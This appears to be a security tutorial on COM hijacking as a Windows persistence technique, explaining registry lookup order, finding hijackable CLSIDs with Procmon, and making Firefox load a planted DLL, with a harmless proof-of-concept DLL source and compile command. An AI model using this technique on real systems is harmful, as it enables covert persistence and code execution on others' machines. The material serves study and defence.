Secondary Categories: 02-Malware 02-Persistence


Description:

A Component Object Model was introduced in Windows 3.11 and is an object-oriented system meant to create binary software components that can interact with each other. This technology allows you to reuse items without knowing how they were made internally.

When a software needs to load a COM object, it uses the Windows API CoCreateInstance to construct an uninitialized object instance of a specific class, with the CLSID (class identifier) as one of the needed parameters. When a program calls CoCreateInstance with a particular CLSID valu, the operating system consults the registry to discover which binary contains the requested COM code

pers

As seen in the photo above you can see that the A1DB7B5E-D0EA-4FE0-93C4-314505788272 CLSID subfolder InProcServer32 has the default registry entry for TaskflowDataEngine.dll.

Depending on how the program is run it could be in one of the following subfolders:

  • InprocServer/InprocServer32
  • LocalServer/LocalServer32
  • TreatAs
  • ProgID

and the top level folder in the registry would be in

  • HKEY_CURRENT_USER\Software\Classes\<CLSID>
  • HKEY_LOCAL_MACHINE\Software\Classes\<CLSID>

Discovery

In order to find COM keys that could be used to hijack you can use Procmon and use the following filters:

pers

Also still good to add: _Exclude if path starts with HKLM

When loading a COM object the HKEY Current User (HKCU) is examined first when trying to load COM objects, giving preference to user-specified COM objects. Then the COM object is looked up in HKEY CLASSES ROOT (HCKR) which is really just HKLM

Example

In the example below firefox.exe looks up COM object with the CLSID A6FF50C0-56C0-71CA-5732-BED303A59628. If we search for this CLSID in the HKCU registry we can see that its not found, but it is found in the HCKR registry.

pers

We can then export this entry and modify it to include our malicious DLL pers pers

The code being executed:

/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/
 
#include <windows.h>
#pragma comment (lib, "user32.lib")
 
BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(
      NULL,
      "Meow from evil.dll!",
      "=^..^=",
      MB_OK
    );
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}

Compiling DLL:

x86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissive

Now with our registry export file modified and a working malicious DLL we can then import it into the registry

pers

Now that this is done we can close firefox and re run it and see our malicious DLL is ran

pers

Extra

Note that once our DLL is ran by firefox we can use process hacker to get the PID. The PID for the message box is 9272, but if we just view the firefox process and its child process we can see that PID 9272 is not there.

pers pers


Resources:

Also Check Out: